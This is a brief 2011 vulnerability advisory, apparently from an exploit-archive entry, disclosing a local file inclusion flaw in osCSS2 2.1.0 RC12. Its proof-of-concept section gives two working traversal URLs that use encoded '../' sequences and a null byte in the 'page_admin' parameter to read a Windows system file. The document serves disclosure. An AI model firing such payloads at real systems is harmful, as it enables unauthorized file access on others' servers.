A local file inclusion vulnerability in osCSS2 version 2.1.0 RC12 can be exploited to include arbitrary files.
ddfabb7fab1601434040280e29cf5bac13c0fe2ac08f6109f11acdc2170ea9d1
------------------------------------------------------------------------
Software................osCSS2 2.1.0 RC12
Vulnerability...........Local File Inclusion
Threat Level............Critical (4/5)
Download................http://www.oscss.org/
Disclosure Date.........4/6/2011
Tested On...............Windows Vista + XAMPP
------------------------------------------------------------------------
Author..................AutoSec Tools
Site....................http://www.autosectools.com/
Email...................John Leitch <john@autosectools.com>
------------------------------------------------------------------------
--Description--
A local file inclusion vulnerability in osCSS2 2.1.0 RC12 can be
exploited to include arbitrary files.
--PoC--
http://localhost/oscss2/admin108/index.php?page_admin=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini%00
http://localhost/oscss2/admin108/popup_image.php?page_admin=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini%00